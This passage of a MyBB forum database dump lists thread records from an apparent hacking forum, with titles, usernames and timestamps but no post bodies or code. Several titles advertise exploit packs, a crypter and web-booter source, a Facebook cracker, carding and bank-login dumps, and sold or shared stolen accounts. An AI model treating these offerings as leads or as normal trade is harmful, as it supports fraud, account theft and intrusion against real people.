`lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('153', '34', '[TUT] How to Render SMOKE and FIRE in Seconds', '0', '0', '0', '54', 'Sin Cara', '1345283932', '401', '1350130517', 'XxTREYZxX', '257', '24', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('154', '19', '[Junk]New Logo', '0', '0', '0', '1', 't3h jok3r', '1345330348', '418', '1345330570', 't3h jok3r', '1', '6', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('155', '3', '[Admin]?????? demoted', '0', '0', '0', '1', 't3h jok3r', '1345416216', '434', '1345554495', 't3h jok3r', '1', '25', '7', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('156', '13', '[tut]View/Download SQL DB', '0', '0', '0', '4', 'Triple H', '1345422231', '449', '1346971441', 'unixmoon', '13', '15', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('157', '15', 'Eleonore Exp 1.2 Expliot pack', '0', '0', '0', '61', 'NXK', '1345439008', '453', '1345595502', 't3h jok3r', '1', '37', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('158', '42', 'So ninja\'s DO exist?!', '0', '0', '0', '61', 'NXK', '1345478497', '460', '1345555006', 'iTzIpod', '82', '14', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('159', '49', 'Editing Thread', '0', '0', '0', '53', 'sirchamp', '1345483110', '461', '1345498385', 't3h jok3r', '1', '14', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('160', '9', '$$$Sh@recash Moneymaking$$$', '0', '0', '0', '53', 'sirchamp', '1345486296', '462', '1345654461', 'iTzIpod', '82', '48', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('165', '5', 'Just did something', '0', '0', '0', '20', 'JakeUS', '1345521453', '492', '1345597603', 't3h jok3r', '1', '12', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('161', '3', 'Congratz NXK', '0', '0', '0', '5', 'Timmy', '1345502850', '469', '1345589159', 'NXK', '61', '42', '11', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('162', '7', 'Applying for that swag award ;)', '0', '0', '0', '61', 'NXK', '1345505359', '476', '1345559185', 'iTzIpod', '82', '39', '2', '0', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('163', '30', '[REAL]Facebook Cracker', '0', '0', '0', '1', 't3h jok3r', '1345509386', '483', '1346073818', 't3h jok3r', '1', '32', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('164', '28', 'Experiences on your upgrade..', '0', '0', '0', '1', 't3h jok3r', '1345509447', '484', '1347717769', 'iTzIpod', '82', '73', '17', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('166', '49', 'New userbars?', '0', '0', '0', '20', 'JakeUS', '1345521887', '493', '1345555500', 't3h jok3r', '1', '15', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('167', '4', 'iTzIpod is here (:', '0', '7', '0', '82', 'iTzIpod', '1345522131', '494', '1345595552', 'iTzIpod', '82', '26', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('168', '50', ':(', '0', '0', '0', '54', 'Sin Cara', '1345533202', '507', '1345569039', 'JakeUS', '20', '28', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('174', '3', 'Coders Group Released', '0', '0', '0', '1', 't3h jok3r', '1345589672', '576', '1345597536', 't3h jok3r', '1', '22', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('171', '8', 'What Genre do you listen to?', '0', '0', '0', '82', 'iTzIpod', '1345555795', '528', '1350235444', 'iTzIpod', '82', '60', '22', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('170', '19', '[Junk]Wu Transfer/Cvv/Skimmed Dumps/Bank Logins & Trfs', '0', '0', '0', '6', 'xlesnyx12', '1345550226', '512', '1345554199', 't3h jok3r', '1', '7', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('172', '3', 'Awards', '0', '0', '0', '5', 'Timmy', '1345557112', '544', '1345557465', 't3h jok3r', '1', '11', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('173', '14', '[TUT] Staying Anonymous', '0', '0', '0', '54', 'Sin Cara', '1345562972', '568', '1345769858', 'Triple H', '4', '26', '2', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('175', '42', 'Is Apple really the most valuable company?', '0', '0', '0', '1', 't3h jok3r', '1345590755', '579', '1345768451', 'Timmy', '5', '14', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('176', '12', '[Tut]How trace an email', '0', '0', '0', '10', 'swa4567', '1345592325', '586', '1347214058', 'duhuh', '90', '16', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('177', '12', '[tut]How to get the FBI login screen', '0', '0', '0', '10', 'swa4567', '1345592811', '587', '1352188865', 'HoverCatz', '67', '41', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('178', '16', 'Social Engineering Domain Companies', '0', '0', '0', '10', 'swa4567', '1345593910', '588', '1345593910', 'swa4567', '10', '10', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('180', '20', '[Free]Saddam\'s Crypter VB.Net source and +19 more![No surveys]', '0', '0', '0', '17', 'khade009', '1345595411', '595', '1345595411', 'khade009', '17', '16', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('179', '34', '[tut] Multiple 3D text tutorials', '0', '0', '0', '1', 't3h jok3r', '1345595286', '593', '1345845786', 'HoverCatz', '67', '9', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('181', '54', 'Fresh 22 Aug HoT [ Brazzers / Mofos / Xhamster / Youjizz .... MorE ] HoT', '0', '0', '0', '1', 't3h jok3r', '1345596736', '605', '1345899596', 'Neal Caffrey', '119', '25', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('182', '49', 'Upgraded Forum', '0', '0', '0', '82', 'iTzIpod', '1345647134', '619', '1345675832', 't3h jok3r', '1', '22', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('183', '54', '2x PlayBoy Premium', '0', '0', '0', '54', 'Sin Cara', '1345647979', '620', '1345860012', '??????Z', '112', '24', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('184', '35', '[Video] I\'m a video editor!', '0', '8', '0', '61', 'NXK', '1345652411', '622', '1346032810', 'iTzIpod', '82', '41', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('185', '4', 'Hey', '0', '0', '0', '90', 'duhuh', '1345670869', '629', '1345689206', 'iTzIpod', '82', '25', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('186', '16', 'SE razor?', '0', '0', '0', '90', 'duhuh', '1345678480', '638', '1346422829', 'iTzIpod', '82', '30', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('187', '3', 'Public Downloads?', '0', '0', '0', '1', 't3h jok3r', '1345678843', '640', '1345847679', 't3h jok3r', '1', '35', '11', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('188', '59', 'MASSIVE ebook COLLECTION {Limited} (300 + ebooks :o)', '0', '2', '0', '90', 'duhuh', '1345679003', '641', '1345864305', 'KFallen', '101', '34', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('189', '49', 'Webmaster Section', '0', '0', '0', '54', 'Sin Cara', '1345720201', '652', '1345820324', 't3h jok3r', '1', '18', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('190', '56', 'Copy and paste game', '0', '0', '0', '61', 'NXK', '1345746025', '665', '1350789934', 't3h jok3r', '1', '451', '103', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('191', '15', 'ProDos v1.0', '0', '0', '0', '53', 'sirchamp', '1345746532', '666', '1346970950', 'spacefish36', '8', '119', '19', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('192', '49', '[Suggestion] Forum Games Section', '0', '0', '0', '82', 'iTzIpod', '1345749254', '667', '1345765315', 'NXK', '61', '16', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('193', '59', '150+ Free Hacking eBooks Collection', '0', '0', '0', '82', 'iTzIpod', '1345752929', '677', '1347650871', 'iTzIpod', '82', '38', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('194', '16', 'So i got this from redbull.', '0', '0', '0', '90', 'duhuh', '1345757587', '681', '1345771987', 'swa4567', '10', '16', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('195', '39', '[Selling] Cheap Netflix Accounts', '0', '0', '0', '82', 'iTzIpod', '1345759118', '688', '1346458283', 'iTzIpod', '82', '41', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('196', '3', 'IMPORTANT ANNOUNCEMENT!!!', '0', '0', '0', '1', 't3h jok3r', '1345765632', '693', '1345853495', 't3h jok3r', '1', '48', '14', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('197', '56', '/me Thread', '0', '0', '0', '82', 'iTzIpod', '1345766578', '696', '1352597634', 'iTzIpod', '82', '189', '70', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('198', '21', '[Tutorial] Setting up your own web Booter[Source Included]', '0', '0', '0', '4', 'Triple H', '1345770454', '713', '1349751523', 'Triple H', '4', '36', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('199', '25', '[Guide]How to protect your identity[Well-detailed]', '0', '0', '0', '4', 'Triple H', '1345770762', '714', '1346181456', 'Baws', '55', '20', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('200', '55', '[Request] Adobe Photoshop CS6 Portable', '0', '0', '0', '82', 'iTzIpod', '1345776608', '723', '1347481426', 'iTzIpod', '82', '34', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('201', '42', 'Lance armstrong stripped of 7 tour titles?', '0', '0', '0', '61', 'NXK', '1345783095', '727', '1345852575', 'NXK', '61', '23', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('202', '25', 'Virus Removal Guide! Pictures and step by step you can\'t fail!', '0', '0', '0', '54', 'Sin Cara', '1345783924', '728', '1345828423', 'Sin Cara', '54', '11', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('205', '53', 'First Java Multiplayer \"Game\"', '0', '0', '0', '67', 'HoverCatz', '1345817135', '743', '1345833072', 'HoverCatz', '67', '24', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('203', '16', '[Limited] Free SEing Help', '0', '0', '0', '82', 'iTzIpod', '1345814261', '739', '1352038974', 'iTzIpod', '82', '49', '14', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('204', '29', '[FREE]Skype Resolver API', '0', '0', '0', '1', 't3h jok3r', '1345816344', '741', '1345847855', 't3h jok3r', '1', '26', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('206', '7', 'Apply for SWAG', '0', '0', '0', '67', 'HoverCatz', '1345823845', '769', '1345898916', 't3h jok3r', '1', '60', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('207', '3', 'Suggest awards and apply for awards', '0', '0', '0', '2', 'Apathy', '1345825880', '776', '1346079447', 'iTzIpod', '82', '54', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('208', '7', 'I m feeling happy ;)', '0', '0', '0', '54', 'Sin Cara', '1345831427', '788', '1345998440', 'sirchamp', '53', '35', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('209', '35', 'Sick Mozilla Firefox Wallpaper/Desktop Background', '0', '0', '0', '82', 'iTzIpod', '1345848449', '819', '1351824006', 'Apathy', '2', '28', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, 